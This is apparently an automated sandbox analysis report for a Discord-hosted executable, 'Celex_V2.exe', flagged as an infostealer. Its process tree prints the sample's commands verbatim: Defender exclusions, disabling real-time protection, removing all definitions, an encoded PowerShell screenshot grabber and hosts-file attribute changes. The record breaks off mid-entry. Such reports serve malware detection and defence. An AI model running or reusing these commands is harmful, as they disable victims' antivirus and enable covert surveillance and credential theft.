Analysis

  • max time kernel
    104s
  • max time network
    157s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24-05-2024 14:23

General

  • Target

    https://cdn.discordapp.com/attachments/1237911695096152177/1243231761635479643/Celex_V2.exe?ex=6650b94e&is=664f67ce&hm=f6c8c9d7dc8c0eed14076219178136e0fcf69465d3476d1f2c70c3d7a3615450&

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 16 IoCs
  • Modifies registry class 3 IoCs
  • NTFS ADS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 15 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1237911695096152177/1243231761635479643/Celex_V2.exe?ex=6650b94e&is=664f67ce&hm=f6c8c9d7dc8c0eed14076219178136e0fcf69465d3476d1f2c70c3d7a3615450&
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4068
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd05fb3cb8,0x7ffd05fb3cc8,0x7ffd05fb3cd8
      2⤵
        PID:224
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
        2⤵
          PID:5076
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2284
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
          2⤵
            PID:3736
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
            2⤵
              PID:4080
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
              2⤵
                PID:3540
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
                2⤵
                  PID:3420
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5628 /prefetch:8
                  2⤵
                    PID:4716
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2128
                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6068 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2408
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13762075266883124865,1754378889205017387,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:8
                    2⤵
                    • NTFS ADS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1684
                • C:\Windows\System32\CompPkgSrv.exe
                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                  1⤵
                    PID:2532
                  • C:\Windows\System32\CompPkgSrv.exe
                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                    1⤵
                      PID:1180
                    • C:\Windows\System32\rundll32.exe
                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                      1⤵
                        PID:3592
                      • C:\Users\Admin\Downloads\Celex_V2.exe
                        "C:\Users\Admin\Downloads\Celex_V2.exe"
                        1⤵
                        • Executes dropped EXE
                        PID:1532
                        • C:\Users\Admin\Downloads\Celex_V2.exe
                          "C:\Users\Admin\Downloads\Celex_V2.exe"
                          2⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2032
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Celex_V2.exe'"
                            3⤵
                              PID:412
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Celex_V2.exe'
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2228
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                              3⤵
                                PID:4932
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1236
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:768
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4988
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                  3⤵
                                    PID:1876
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic csproduct get uuid
                                      4⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1704
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                    3⤵
                                      PID:3960
                                      • C:\Windows\system32\reg.exe
                                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                        4⤵
                                          PID:4716
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                        3⤵
                                          PID:2880
                                          • C:\Windows\system32\reg.exe
                                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                            4⤵
                                              PID:1100
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                            3⤵
                                              PID:656
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic path win32_VideoController get name
                                                4⤵
                                                • Detects videocard installed
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4016
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                              3⤵
                                                PID:1652
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic path win32_VideoController get name
                                                  4⤵
                                                  • Detects videocard installed
                                                  PID:388
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‌ .scr'"
                                                3⤵
                                                  PID:1704
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‌ .scr'
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1848
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  3⤵
                                                    PID:4588
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      4⤵
                                                      • Enumerates processes with tasklist
                                                      PID:4996
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:4892
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:2680
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                      3⤵
                                                        PID:2556
                                                        • C:\Windows\system32\reg.exe
                                                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                          4⤵
                                                            PID:4444
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                          3⤵
                                                            PID:4744
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3412
                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5kln521w\5kln521w.cmdline"
                                                                5⤵
                                                                  PID:2180
                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB96D.tmp" "c:\Users\Admin\AppData\Local\Temp\5kln521w\CSCE58A746BE540488EBF54B3182DB7435F.TMP"
                                                                    6⤵
                                                                      PID:4604
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                3⤵
                                                                  PID:1540
                                                                  • C:\Windows\system32\attrib.exe
                                                                    attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                    4⤵
                                                                    • Drops file in Drivers directory
                                                                    • Views/modifies file attributes
                                                                    PID:4260
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                  3⤵
                                                                    PID:4308
                                                                    • C:\Windows\system32\attrib.exe
